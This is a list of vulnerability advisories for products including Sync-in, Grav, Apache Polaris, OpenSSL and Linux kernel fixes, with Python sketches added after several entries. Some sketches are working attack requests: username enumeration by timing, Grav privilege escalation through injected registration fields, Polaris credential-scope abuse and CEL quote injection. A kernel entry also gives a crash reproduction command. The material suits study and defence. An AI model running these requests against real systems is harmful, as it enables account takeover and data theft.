| Sync-in Server is a secure, open-source platform for file storage, sharing, collaboration, and syncing. Prior to version 2.2.0, the /api/auth/login endpoint contains a logic flaw that allows unauthenticated remote attackers to enumerate valid usernames by measuring the application's response time. This issue has been patched in version 2.2.0. |
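A minimal sketch of the enumeration technique the advisory describes, assuming a JSON login body; the field names (`login`, `password`), the placeholder host, and the 2x-baseline heuristic are illustrative assumptions, not details from the advisory:

```python
import time
import requests

BASE = "https://sync-in.example.com"  # placeholder host

def login_latency(username: str, samples: int = 5) -> float:
    """Median wall-clock time of a failed login attempt for this username."""
    timings = []
    for _ in range(samples):
        start = time.perf_counter()
        requests.post(f"{BASE}/api/auth/login",
                      json={"login": username, "password": "wrong-password"},
                      timeout=10)
        timings.append(time.perf_counter() - start)
    return sorted(timings)[len(timings) // 2]

baseline = login_latency("no-such-user-a8f3")  # known-invalid name
for candidate in ["alice", "bob", "admin"]:
    # Assumed heuristic: a markedly slower response (e.g. a password hash
    # actually being computed) suggests the username exists.
    if login_latency(candidate) > 2 * baseline:
        print(f"{candidate}: likely a valid username")
```

In practice an attacker would take many more samples and use a statistical test, but the median-vs-baseline comparison shows the shape of the attack.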
| PromptHub is an all-in-one AI toolbox for prompt, skill, and agent management. From version 0.4.9 to before version 0.5.4, apps/web/src/routes/skills.ts exposes an authenticated endpoint POST /api/skills/fetch-remote that fetches a user-supplied URL server-side and reflects the response body (up to 5 MB) back to the caller. The SSRF protection in apps/web/src/utils/remote-http.ts (isPrivateIPv6) attempts to block private/loopback destinations, but multiple alternate-but-valid IPv6 representations bypass the check. The bypasses reach any IPv4 address (loopback, RFC1918, link-local) via IPv4-mapped IPv6 in hex form, and the canonical ::1 via any representation that isn't the literal string "::1". Any authenticated user (role: user or admin) can trigger the SSRF. On deployments configured with ALLOW_REGISTRATION=true — a supported and documented configuration — this means any internet user who can register. This issue has been patched in version 0.5.4. |
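The following sketch, using only Python's standard `ipaddress` module, shows why comparing raw address strings (as the advisory says the `isPrivateIPv6` check effectively does) fails, and what a parse-then-classify check looks like; the TypeScript blocklist logic is paraphrased here, not reproduced:

```python
import ipaddress

def naive_is_blocked(host: str) -> bool:
    # Mirrors the flawed idea: compare the raw string against "::1".
    return host == "::1"

def robust_is_blocked(host: str) -> bool:
    # Parse first, then classify; unwrap IPv4-mapped IPv6 addresses.
    addr = ipaddress.ip_address(host)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped
    return addr.is_loopback or addr.is_private or addr.is_link_local

for host in ["::1", "0:0:0:0:0:0:0:1", "::ffff:7f00:1", "::ffff:a00:1"]:
    print(host, naive_is_blocked(host), robust_is_blocked(host))
# Only the literal "::1" trips the naive check; the parsed check blocks all
# four (loopback, loopback, mapped 127.0.0.1, mapped 10.0.0.1).
```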
| Insertion of Sensitive Information Into Sent Data vulnerability in Saad Iqbal WP EasyPay wp-easy-pay allows Retrieve Embedded Sensitive Data. This issue affects WP EasyPay: from n/a through 4.3.0. |
| Grav is a file-based Web platform. Prior to 2.0.0-beta.2, the Login::register() method in the Login plugin accepts attacker-controlled groups and access fields from the registration POST data without server-side validation. When registration is enabled and groups or access are included in the configured allowed fields list, an unauthenticated user can self-register with admin.super privileges by injecting these fields into the registration request. This vulnerability is fixed in 2.0.0-beta.2. |
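A hedged sketch of the request shape such an attack could take; the form field names and registration path are assumptions modeled on typical Grav form plugins, not confirmed details from the advisory:

```python
import requests

payload = {
    "data[username]": "attacker",
    "data[email]": "attacker@example.com",
    "data[password]": "S3cret!pass",
    # The injected fields: accepted server-side without validation when
    # "groups"/"access" appear in the configured allowed-fields list.
    "data[groups][]": "admin",
    "data[access][admin][super]": "true",
}
requests.post("https://grav.example.com/register", data=payload, timeout=10)
```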
| WeGIA is a web manager for charitable institutions. In versions prior to 3.6.10, when attempting to upload a file with malicious content to funcionario/docdependente_upload.php, the application responds with an overly descriptive error message. This leads to information disclosure, effectively increasing the attack surface by providing potential attackers with technical insights to refine their exploits. This vulnerability is fixed in 3.6.10. |
| In Apache Iceberg, a table's metadata files are control files: they tell readers which data files belong to the table and which table version to read. `write.metadata.path` is an optional table property that tells Polaris where to write those metadata files. For a table already registered in a Polaris-managed catalog, changing only that property through an `ALTER TABLE`-style settings change (not a row-level `INSERT`, `SELECT`, `UPDATE`, or `DELETE`) bypasses the commit-time branch that is supposed to revalidate storage locations.
The full persisted / credential-vending variant requires the affected catalog to have `polaris.config.allow.unstructured.table.location=true`, with `allowedLocations` broad enough to include the attacker-chosen target. `allowedLocations` is the admin-configured allowlist of storage paths that the catalog is allowed to use. Public project materials suggest that this flag is a real, supported compatibility/layout mode, not just a contrived lab-only prerequisite.
In that configuration, a user who can change table settings can cause Apache Polaris itself to write new table metadata to an attacker-chosen reachable storage location before the intended location-validation branch runs. If the later concrete-path validation also accepts that location, Polaris persists the resulting metadata path into stored table state. Later table-load and credential APIs can then return temporary cloud-storage credentials for the same location without revalidating it. In plain terms, Polaris can later hand out temporary storage access for the same attacker-chosen area.
That attacker-chosen area does not need to be limited to the poisoned table's own files. If it is a broader storage prefix, another table's prefix, or, depending on configuration or provider behavior, even a bucket/container root, the resulting disclosure or corruption scope can extend to any data and metadata Polaris can reach there.
The practical consequences are therefore similar to the staged-create credential-vending issue already discussed: data and metadata reachable in that storage scope can be exposed and, if write-capable credentials are later issued, modified, corrupted, or removed. Even before that later credential step, Polaris itself performs the metadata write to the unchecked location, so the core issue is not only later credential vending. The primary defect is that Polaris skips its intended location checks before performing a security-sensitive metadata write when only `write.metadata.path` changes.
When `polaris.config.allow.unstructured.table.location=false`, current code review suggests the later `updateTableLike(...)` validation usually rejects out-of-tree metadata locations before the unsafe path is persisted. That may mitigate the persisted / credential-vending variant, but it does not remove the underlying defect: Polaris still skips the intended pre-write location check when only `write.metadata.path` changes. |
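As a sketch of how small the triggering change is, the settings-only commit could look like the following Iceberg REST request. The `set-properties` update action is part of the Iceberg REST catalog spec; the host, catalog prefix, token, and target path below are placeholders, and the exact request an engine emits for an `ALTER TABLE` may differ:

```python
import requests

commit = {
    "requirements": [],  # no schema/snapshot changes: a settings-only commit
    "updates": [{
        "action": "set-properties",
        "updates": {
            # Attacker-chosen location inside a broad allowedLocations entry.
            "write.metadata.path": "s3://victim-bucket/other-prefix/metadata",
        },
    }],
}
requests.post(
    "https://polaris.example.com/api/catalog/v1/cat/namespaces/ns/tables/t",
    json=commit,
    headers={"Authorization": "Bearer <token>"},
    timeout=10,
)
```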
| In plain terms, Apache Polaris is supposed to issue short-lived GCS credentials that only work for one table's files, but a crafted namespace or table name can cause those credentials to work across the configured bucket instead.
Apache Polaris builds Google Cloud Storage downscoped credentials by creating a Credential Access Boundary (CAB) with CEL conditions that are intended to restrict access to the requested table's storage path. The relevant CEL string is built from the bucket name and the table path, and that table path is derived from namespace and table identifiers. In current code, that path appears to be inserted into the CEL expression without escaping. As a result, a namespace or table identifier containing a single quote and other URI-safe CEL fragments can break out of the intended quoted string and change the meaning of the CEL condition.
In private testing against Polaris 1.4.0 on real Google Cloud Storage, it was confirmed that Polaris accepted a crafted identifier and returned delegated GCS credentials whose CEL path restriction had effectively collapsed. Those delegated credentials could then:
- list another table's object prefix;
- read another table's metadata control file (Iceberg metadata JSON);
- create and delete an object under another table's object prefix;
- and also list, read, create, and delete objects under an unrelated external prefix in the same bucket that was not part of any table path.
That last point is important. The issue is not limited to "another table": in the confirmed setup, once Apache Polaris returned credentials for the crafted table, the path restriction inside the configured bucket was effectively gone. The practical effect is that temporary credentials for one crafted table can be broader than the table Polaris was asked to authorize, and can become effectively bucket-wide within the configured bucket.
The current GCS testing used a Polaris principal with broad catalog privileges for setup. A separate least-privilege Polaris RBAC variant has not yet been tested on GCS. However, the storage-credential broadening behavior itself has been confirmed on GCS. |
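A minimal sketch of the quoting flaw: the CEL template below is illustrative rather than the exact expression Polaris generates, but it shows how a single quote in an identifier closes the intended string literal and appends an attacker-controlled OR branch:

```python
# The crafted identifier embeds a quote plus an OR branch.
table_path = "ns/evil') || resource.name.startsWith('projects/_/buckets/bkt"

# Naive interpolation of the table path into the CAB availability condition:
cel = ("resource.name.startsWith('projects/_/buckets/bkt/objects/"
       + table_path + "')")
print(cel)
# -> resource.name.startsWith('projects/_/buckets/bkt/objects/ns/evil')
#    || resource.name.startsWith('projects/_/buckets/bkt')
# The second branch matches every object in the bucket, so the intended
# per-table path restriction has effectively collapsed.
```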
| Apache Polaris accepts literal `*` characters in namespace and table names. When it later builds temporary S3 access policies for delegated table access, those same characters appear to be reused unescaped in S3 IAM resource patterns and `s3:prefix` conditions. In S3 IAM policy matching, `*` is treated as a wildcard rather than as ordinary text, which means temporary credentials issued for one crafted table can match the storage path of a different table.
In private testing against Polaris 1.4.0 using Polaris' AWS S3 temporary-credential path on both MinIO and real AWS S3, credentials returned for crafted tables such as `f*.t1`, `f*.*`, `*.*`, and `foo.*` could reach other tables' S3 locations. The confirmed behavior includes:
- reading another table's metadata control file (Iceberg metadata JSON);
- listing another table's exact S3 table prefix;
- and, when write delegation was returned for the crafted table, creating and deleting an object under another table's exact S3 table prefix.
A control case using ordinary distinct names did not allow the same cross-table access.
A least-privilege AWS S3 variant was also confirmed in which the attacker principal had no Polaris permissions on the victim table and only the minimal permissions required to create and use a crafted wildcard table (namespace-scoped `TABLE_CREATE` and `TABLE_WRITE_DATA` on `*`). In that setup, direct Polaris access to `foo.t1` remained forbidden, but the attacker could still create and load `*.*`, receive delegated S3 credentials, and use those credentials to list, read, create, and delete objects under `foo.t1`.
In Iceberg, the metadata JSON file is a control file: it tells readers which data files belong to the table, which snapshots exist, and which table version to read. So unauthorized access to it is already a meaningful confidentiality problem, and the confirmed write-capable variant means the issue is not limited to disclosure. |
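A small sketch of the matching problem, using Python's `fnmatch` as a stand-in for IAM wildcard semantics (close enough for illustration; real IAM patterns also support `?`); the bucket name and warehouse layout are assumed:

```python
from fnmatch import fnmatch

# Resource pattern as it would appear if the crafted table "f*.t1"
# (namespace "f*", table "t1") were substituted into the policy unescaped:
pattern = "arn:aws:s3:::bucket/warehouse/f*/t1/*"

victim = "arn:aws:s3:::bucket/warehouse/foo/t1/metadata/v1.metadata.json"
print(fnmatch(victim, pattern))  # True: the crafted grant reaches foo.t1

other = "arn:aws:s3:::bucket/warehouse/bar/t2/data"
print(fnmatch(other, pattern))   # False: ordinary names do not collide
```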
| Apache Polaris can issue broad temporary ("vended") storage credentials during staged table creation before the effective table location has been validated or durably reserved. Those temporary credentials are meant to limit the scope of accessible table data and metadata, but this scope limitation becomes attacker-directed because the attacker can choose a reachable target location.
In the confirmed variant, if the caller supplies a custom `location` during stage create and requests credential vending, Apache Polaris uses that location to construct delegated storage credentials immediately. The stage-create path itself runs neither the normal location validation nor the overlap checks before those credentials are issued.
Closely related to that, the staged-create flow also accepts `write.data.path` / `write.metadata.path` in the request properties and feeds those location overrides into the same effective table location set used for credential vending. Those fields are secondary to the main custom-`location` exploit, but they are still attacker-influenced location inputs that should be validated before any credentials are issued. |
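A sketch of the request shape for the staged-create variant; `stage-create` and the `X-Iceberg-Access-Delegation` header come from the Iceberg REST spec, while the host, token, schema, and target location are placeholders:

```python
import requests

create = {
    "name": "t_staged",
    "stage-create": True,
    # Attacker-supplied location, used for credential vending before the
    # normal location validation and overlap checks run:
    "location": "s3://victim-bucket/target-prefix",
    "schema": {"type": "struct", "schema-id": 0, "fields": [
        {"id": 1, "name": "c1", "required": False, "type": "long"},
    ]},
}
requests.post(
    "https://polaris.example.com/api/catalog/v1/cat/namespaces/ns/tables",
    json=create,
    headers={
        "Authorization": "Bearer <token>",
        "X-Iceberg-Access-Delegation": "vended-credentials",
    },
    timeout=10,
)
```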
| Issue summary: A timing side-channel which could potentially allow remote recovery of the private key exists in the SM2 algorithm implementation on 64-bit ARM platforms.
Impact summary: A timing side-channel in SM2 signature computations on 64-bit ARM platforms could allow an attacker to recover the private key.
While remote key recovery over a network was not attempted by the reporter, timing measurements revealed a timing signal which may allow such an attack.
OpenSSL does not directly support certificates with SM2 keys in TLS, and so this CVE is not relevant in most TLS contexts. However, given that it is possible to add support for such certificates via a custom provider, coupled with the fact that in such a custom provider context the private key may be recoverable via remote timing measurements, we consider this to be a Moderate severity issue.
The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as SM2 is not an approved algorithm. |
| Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 8u461, 8u461-perf, 11.0.28, 17.0.16, 21.0.8, 25; Oracle GraalVM for JDK: 17.0.16 and 21.0.8; Oracle GraalVM Enterprise Edition: 21.3.15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). |
| net-tools is a collection of programs that form the base set of the NET-3 networking distribution for the Linux operating system. In versions up to and including 2.10, the Linux network utilities (like ifconfig) from the net-tools package do not properly validate the structure of /proc files when showing interfaces. `get_name()` in `interface.c` copies interface labels from `/proc/net/dev` into a fixed 16-byte stack buffer without bounds checking, leading to possible arbitrary code execution or crash. The known attack path does not require privilege but also does not provide privilege escalation in this scenario. A patch is available and expected to be part of version 2.20. |
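A conceptual sketch, in Python rather than the affected C, of the bounds check `get_name()` lacks: labels parsed out of `/proc/net/dev` must fit the fixed `IFNAMSIZ` (16 bytes including the NUL terminator) buffer, so anything longer should be rejected rather than copied:

```python
IFNAMSIZ = 16  # fixed buffer size used by the C code, per the advisory

def parse_iface_names(proc_net_dev: str) -> list[str]:
    names = []
    for line in proc_net_dev.splitlines()[2:]:  # skip the two header lines
        label = line.split(":", 1)[0].strip()
        # The missing check: an oversized label must not be copied verbatim.
        if len(label.encode()) >= IFNAMSIZ:
            raise ValueError(f"interface label too long: {label[:15]!r}...")
        names.append(label)
    return names

with open("/proc/net/dev") as f:
    print(parse_iface_names(f.read()))
```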
| In the Linux kernel, the following vulnerability has been resolved:
ipv6: sr: Fix MAC comparison to be constant-time
To prevent timing attacks, MACs need to be compared in constant time.
Use the appropriate helper function for this. |
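The same principle is easy to show in userspace Python: `hmac.compare_digest` is the analogue of a constant-time kernel helper such as `crypto_memneq()`, whereas `==` can return as soon as the first mismatching byte is found:

```python
import hmac

expected_mac = bytes.fromhex("aabbccdd" * 4)
received_mac = bytes.fromhex("aabbccdd" * 4)

# Timing-unsafe: byte comparison short-circuits at the first difference,
# leaking how many leading bytes of a guess were correct.
unsafe_equal = received_mac == expected_mac

# Timing-safe: runtime is independent of where the inputs differ.
safe_equal = hmac.compare_digest(received_mac, expected_mac)
print(unsafe_equal, safe_equal)
```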
| In the Linux kernel, the following vulnerability has been resolved:
net: let net.core.dev_weight always be non-zero
The following problem was encountered during stability test:
(NULL net_device): NAPI poll function process_backlog+0x0/0x530 \
returned 1, exceeding its budget of 0.
------------[ cut here ]------------
list_add double add: new=ffff88905f746f48, prev=ffff88905f746f48, \
next=ffff88905f746e40.
WARNING: CPU: 18 PID: 5462 at lib/list_debug.c:35 \
__list_add_valid_or_report+0xf3/0x130
CPU: 18 UID: 0 PID: 5462 Comm: ping Kdump: loaded Not tainted 6.13.0-rc7+
RIP: 0010:__list_add_valid_or_report+0xf3/0x130
Call Trace:
? __warn+0xcd/0x250
? __list_add_valid_or_report+0xf3/0x130
enqueue_to_backlog+0x923/0x1070
netif_rx_internal+0x92/0x2b0
__netif_rx+0x15/0x170
loopback_xmit+0x2ef/0x450
dev_hard_start_xmit+0x103/0x490
__dev_queue_xmit+0xeac/0x1950
ip_finish_output2+0x6cc/0x1620
ip_output+0x161/0x270
ip_push_pending_frames+0x155/0x1a0
raw_sendmsg+0xe13/0x1550
__sys_sendto+0x3bf/0x4e0
__x64_sys_sendto+0xdc/0x1b0
do_syscall_64+0x5b/0x170
entry_SYSCALL_64_after_hwframe+0x76/0x7e
The reproduction command is as follows:
sysctl -w net.core.dev_weight=0
ping 127.0.0.1
This is because when the napi's weight is set to 0, process_backlog() may
return 0 and clear the NAPI_STATE_SCHED bit of napi->state, causing this
napi to be re-polled in net_rx_action() until __do_softirq() times out.
Since the NAPI_STATE_SCHED bit has been cleared, napi_schedule_rps() can
be retriggered in enqueue_to_backlog(), causing this issue.
Making the napi's weight always non-zero solves this problem.
Triggering this issue requires system-wide admin (setting is
not namespaced). |
| In the Linux kernel, the following vulnerability has been resolved:
bpf: Send signals asynchronously if !preemptible
BPF programs can execute in all kinds of contexts and when a program
running in a non-preemptible context uses the bpf_send_signal() kfunc,
it will cause issues because this kfunc can sleep.
Change `irqs_disabled()` to `!preemptible()`. |
| In the Linux kernel, the following vulnerability has been resolved:
md/md-bitmap: Synchronize bitmap_get_stats() with bitmap lifetime
After commit ec6bb299c7c3 ("md/md-bitmap: add 'sync_size' into struct
md_bitmap_stats"), following panic is reported:
Oops: general protection fault, probably for non-canonical address
RIP: 0010:bitmap_get_stats+0x2b/0xa0
Call Trace:
<TASK>
md_seq_show+0x2d2/0x5b0
seq_read_iter+0x2b9/0x470
seq_read+0x12f/0x180
proc_reg_read+0x57/0xb0
vfs_read+0xf6/0x380
ksys_read+0x6c/0xf0
do_syscall_64+0x82/0x170
entry_SYSCALL_64_after_hwframe+0x76/0x7e
Root cause is that bitmap_get_stats() can be called at any time if mddev
is still there, even if bitmap is destroyed, or not fully initialized.
Dereferencing bitmap in this case can crash the kernel. Meanwhile, the
above commit started dereferencing bitmap->storage, making the problem
easier to trigger.
Fix the problem by protecting bitmap_get_stats() with bitmap_info.mutex. |
| In the Linux kernel, the following vulnerability has been resolved:
dm thin: make get_first_thin use rcu-safe list first function
The documentation in rculist.h explains the absence of list_empty_rcu()
and cautions programmers against relying on a list_empty() ->
list_first() sequence in RCU safe code. This is because each of these
functions performs its own READ_ONCE() of the list head. This can lead
to a situation where the list_empty() sees a valid list entry, but the
subsequent list_first() sees a different view of list head state after a
modification.
In the case of dm-thin, this author had a production box crash from a GP
fault in the process_deferred_bios path. This function saw a valid list
head in get_first_thin() but when it subsequently dereferenced that and
turned it into a thin_c, it got the inside of the struct pool, since the
list was now empty and referring to itself. The kernel on which this
occurred printed both a warning about a refcount_t being saturated, and
a UBSAN error for an out-of-bounds cpuid access in the queued spinlock,
prior to the fault itself. When the resulting kdump was examined, it
was possible to see another thread patiently waiting in thin_dtr's
synchronize_rcu.
The thin_dtr call managed to pull the thin_c out of the active thins
list (and have it be the last entry in the active_thins list) at just
the wrong moment, which led to this crash.
Fortunately, the fix here is straightforward. Switch the get_first_thin()
function to use list_first_or_null_rcu() which performs just a single
READ_ONCE() and returns NULL if the list is already empty.
This was run against the devicemapper test suite's thin-provisioning
suites for delete and suspend and no regressions were observed. |
| In the Linux kernel, the following vulnerability has been resolved:
net_sched: cls_flow: validate TCA_FLOW_RSHIFT attribute
syzbot found that TCA_FLOW_RSHIFT attribute was not validated.
Right shifting a 32-bit integer is undefined for large shift values (a
validation sketch follows the trace below).
UBSAN: shift-out-of-bounds in net/sched/cls_flow.c:329:23
shift exponent 9445 is too large for 32-bit type 'u32' (aka 'unsigned int')
CPU: 1 UID: 0 PID: 54 Comm: kworker/u8:3 Not tainted 6.13.0-rc3-syzkaller-00180-g4f619d518db9 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024
Workqueue: ipv6_addrconf addrconf_dad_work
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:94 [inline]
dump_stack_lvl+0x241/0x360 lib/dump_stack.c:120
ubsan_epilogue lib/ubsan.c:231 [inline]
__ubsan_handle_shift_out_of_bounds+0x3c8/0x420 lib/ubsan.c:468
flow_classify+0x24d5/0x25b0 net/sched/cls_flow.c:329
tc_classify include/net/tc_wrapper.h:197 [inline]
__tcf_classify net/sched/cls_api.c:1771 [inline]
tcf_classify+0x420/0x1160 net/sched/cls_api.c:1867
sfb_classify net/sched/sch_sfb.c:260 [inline]
sfb_enqueue+0x3ad/0x18b0 net/sched/sch_sfb.c:318
dev_qdisc_enqueue+0x4b/0x290 net/core/dev.c:3793
__dev_xmit_skb net/core/dev.c:3889 [inline]
__dev_queue_xmit+0xf0e/0x3f50 net/core/dev.c:4400
dev_queue_xmit include/linux/netdevice.h:3168 [inline]
neigh_hh_output include/net/neighbour.h:523 [inline]
neigh_output include/net/neighbour.h:537 [inline]
ip_finish_output2+0xd41/0x1390 net/ipv4/ip_output.c:236
iptunnel_xmit+0x55d/0x9b0 net/ipv4/ip_tunnel_core.c:82
udp_tunnel_xmit_skb+0x262/0x3b0 net/ipv4/udp_tunnel_core.c:173
geneve_xmit_skb drivers/net/geneve.c:916 [inline]
geneve_xmit+0x21dc/0x2d00 drivers/net/geneve.c:1039
__netdev_start_xmit include/linux/netdevice.h:5002 [inline]
netdev_start_xmit include/linux/netdevice.h:5011 [inline]
xmit_one net/core/dev.c:3590 [inline]
dev_hard_start_xmit+0x27a/0x7d0 net/core/dev.c:3606
__dev_queue_xmit+0x1b73/0x3f50 net/core/dev.c:4434 |
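A conceptual sketch, in Python, of the missing validation: a right shift of a 32-bit value is only defined for exponents 0..31, so the attribute must be range-checked before the classify path uses it (Python integers do not overflow, so the u32 semantics are emulated here purely for illustration):

```python
U32_BITS = 32

def validate_rshift(rshift: int) -> int:
    # The check the classifier lacked: reject out-of-range shift exponents
    # at attribute-parse time instead of shifting with them later.
    if not (0 <= rshift < U32_BITS):
        raise ValueError(f"rshift {rshift} out of range for u32")
    return rshift

def classify(key: int, rshift: int) -> int:
    return (key & 0xFFFFFFFF) >> validate_rshift(rshift)

print(classify(0xDEADBEEF, 9))    # fine
try:
    classify(0xDEADBEEF, 9445)    # the exponent from the syzbot report
except ValueError as e:
    print("rejected:", e)         # rejected instead of undefined behavior
```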
| In the Linux kernel, the following vulnerability has been resolved:
HID: core: Fix assumption that Resolution Multipliers must be in Logical Collections
A report in 2019 by the syzbot fuzzer was found to be connected to two
errors in the HID core associated with Resolution Multipliers. One of
the errors was fixed by commit ea427a222d8b ("HID: core: Fix deadloop
in hid_apply_multiplier."), but the other has not been fixed.
This error arises because hid_apply_multiplier() assumes that every
Resolution Multiplier control is contained in a Logical Collection,
i.e., there's no way the routine can ever set multiplier_collection to
NULL. This is in spite of the fact that the function starts with a
big comment saying:
* "The Resolution Multiplier control must be contained in the same
* Logical Collection as the control(s) to which it is to be applied.
...
* If no Logical Collection is
* defined, the Resolution Multiplier is associated with all
* controls in the report."
* HID Usage Table, v1.12, Section 4.3.1, p30
*
* Thus, search from the current collection upwards until we find a
* logical collection...
The comment and the code overlook the possibility that none of the
collections found may be a Logical Collection.
The fix is to set the multiplier_collection pointer to NULL if the
collection found isn't a Logical Collection. |
| In the Linux kernel, the following vulnerability has been resolved:
hrtimers: Handle CPU state correctly on hotplug
Consider a scenario where a CPU transitions from CPUHP_ONLINE to halfway
through a CPU hotunplug down to CPUHP_HRTIMERS_PREPARE, and then back to
CPUHP_ONLINE:
Since hrtimers_prepare_cpu() does not run, cpu_base.hres_active remains set
to 1 throughout. However, during a CPU unplug operation, the tick and the
clockevents are shut down at CPUHP_AP_TICK_DYING. On return to the online
state, for instance CFS incorrectly assumes that the hrtick is already
active, and the chance of the clockevent device to transition to oneshot
mode is also lost forever for the CPU, unless it goes back to a lower state
than CPUHP_HRTIMERS_PREPARE once.
This round-trip reveals another issue; cpu_base.online is not set to 1
after the transition, which appears as a WARN_ON_ONCE in enqueue_hrtimer().
Aside from that, the bulk of the per-CPU state is not reset either, which
means there are dangling pointers in the worst case.
Address this by adding a corresponding startup() callback, which resets the
stale per CPU state and sets the online flag.
[ tglx: Make the new callback unconditionally available, remove the online
modification in the prepare() callback and clear the remaining
state in the starting callback instead of the prepare callback ] |